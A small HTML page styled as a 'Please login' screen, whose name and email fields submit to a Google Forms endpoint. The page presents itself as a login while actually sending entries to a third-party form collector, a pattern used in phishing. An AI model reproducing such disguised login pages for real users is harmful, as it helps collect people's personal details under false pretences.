<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>form</title>
  </head>
  <style>
    @import "bourbon";

body {
	background: #eee !important;	
}

.wrapper {	
	margin-top: 80px;
  margin-bottom: 80px;
}

.form-signin {
  max-width: 380px;
  padding: 15px 35px 45px;
  margin: 0 auto;
  background-color: #fff;
  border: 1px solid rgba(0,0,0,0.1);  

  .form-signin-heading,
	.checkbox {
	  margin-bottom: 30px;
	}

	.checkbox {
	  font-weight: normal;
	}

	.form-control {
	  position: relative;
	  font-size: 16px;
	  height: auto;
	  padding: 10px;
		@include box-sizing(border-box);

		&:focus {
		  z-index: 2;
		}
	}

	input[type="text"] {
	  margin-bottom: -1px;
	  border-bottom-left-radius: 0;
	  border-bottom-right-radius: 0;
	}

	input[type="password"] {
	  margin-bottom: 20px;
	  border-top-left-radius: 0;
	  border-top-right-radius: 0;
	}
}

  </style>
  <body>
    <div class="wrapper">
      <form class="form-signin" action="https://docs.google.com/forms/d/e/1FAIpQLSduj-sL-3dkkn4dHbDnuKLMOk-1OXEPOHXoUCYIL9s-YInXQQ/formResponse">       
        <h2 class="form-signin-heading">Please login</h2>
        <input type="text" class="form-control" name="entry.888105732=123-namecheck" placeholder="name"  autofocus="" />
        <input type="text" class="form-control" name="entry.1682472918=123-mailcheck" placeholder="email"  />       
        <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>   
      </form>
    </div>
    </form>
  </body>
</html>
